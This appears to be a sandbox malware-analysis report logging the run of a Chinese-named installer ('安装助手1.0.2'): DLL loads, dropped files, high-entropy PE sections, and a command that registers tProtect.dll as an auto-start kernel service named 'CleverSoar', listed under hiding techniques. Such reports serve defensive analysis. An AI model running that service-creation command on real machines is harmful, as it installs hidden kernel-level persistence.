Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeStatic file information: File size 5707508 > 1048576
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2189179691.0000000003720000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2188798294.0000000003520000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00F157D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00F157D0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeStatic PE information: real checksum: 0x0 should be: 0x5810a0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: update.vac.6.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.2.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: hrsw.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: tProtect.dll.12.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.2.drStatic PE information: section name: .00cfg
Source: update.vac.2.drStatic PE information: section name: .voltbl
Source: update.vac.2.drStatic PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.drStatic PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: is-EIO1L.tmp.6.drStatic PE information: section name: .xdata
Source: hrsw.vbc.6.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.6.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.6.drStatic PE information: section name: .=~
Source: update.vac.6.drStatic PE information: section name: .00cfg
Source: update.vac.6.drStatic PE information: section name: .voltbl
Source: update.vac.6.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6CC486EB push ecx; ret 6_2_6CC486FE
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6CAF0F00 push ss; retn 0001h6_2_6CAF0F0A
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6CD16F10 push eax; ret 6_2_6CD16F2E
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6CC7B9F4 push 004AC35Ch; ret 6_2_6CC7BA0E
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6CD17290 push eax; ret 6_2_6CD172BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E945F4 push 00F3C35Ch; ret 10_2_00E9460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00F2FB10 push eax; ret 10_2_00F2FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00F2FE90 push eax; ret 10_2_00F2FEBE
Source: update.vac.2.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.6.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.6.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeFile created: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HSL06.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeFile created: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-VBCHJ.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-VBCHJ.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Program Files (x86)\Windows NT\is-EIO1L.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HSL06.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HSL06.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-VBCHJ.tmp\update.vacJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
